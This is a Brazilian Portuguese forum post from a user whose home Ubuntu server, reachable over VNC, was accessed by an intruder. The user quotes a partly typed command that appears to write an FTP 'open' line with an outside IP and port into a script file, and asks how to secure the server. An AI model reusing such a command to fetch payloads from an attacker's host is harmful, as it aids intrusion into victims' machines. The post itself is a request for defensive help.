Ir ao conteúdo

Invadiram meu 'servidor' Ubuntu 9.10 e começaram a digitar comandos...

Espartano

Posts recomendados

Postado

Olá pessoal!

Eu tinha um PC sobrando aqui, e resolvi colocar ele como servidor de mídia na rede local de casa. Aí aproveitei pra também deixar ele fazendo downloads. Abri as portas que uso pro eMule e pro Deluge (torrent) no modem. A configuração da rede local é a seguinte:

Modem ADSL (roteador) -> roteador wireless (modo bridge) -> PCs e notebooks

Aí resolvi deixar esse PC servidor sem teclado, monitor, etc. e instalei o VNC nele pra poder acessar remotamente na rede local. Abri as seguintes portas nele: 5500 e 5900 (pro VNC).

Aí pra brincar um pouoco, instalei o django e apache2 e redirecionei as portas 80 e 443 do meu IP fixo pro servidor (cujo IP na rede local é 10.1.1.2).

Estava controlando a maquina hoje no VNC e de repente vi que alguém começou a digitar alguns comandos. Desliguei a máquina, e o comando que estava sendo digitado era o seguinte:

cecho open 187.1.204.74 35632 >> ik &ech

Nesse ponto parou porque eu desliguei a máquina. O IP digitado nao é o meu.

Através disso dá pra imaginar o que estavam tentando fazer? Quais medidas de segurança posso fazer pra que isso não ocorra de novo? Já posso ter sofrido algum dano? Se sim, o que fazer pra minimizar?

Lembrando que isso pode ter ocorrido antes, já que apenas por sorte eu estava usando o VNC...

Aqui uma imagem do que estava acontecendo quando desliguei:

invasao.png

Valeu galera!!

Arquivado

Este tópico foi arquivado e está fechado para novas respostas.

Sobre o Clube do Hardware

No ar desde 1996, o Clube do Hardware é uma das maiores, mais antigas e mais respeitadas comunidades sobre tecnologia do Brasil. Leia mais

Direitos autorais

Não permitimos a cópia ou reprodução do conteúdo do nosso site, fórum, newsletters e redes sociais, mesmo citando-se a fonte. Leia mais

• Criar novo...

LANÇAMENTO!

eletronica2025-popup.jpg

CLIQUE AQUI E BAIXE AGORA MESMO!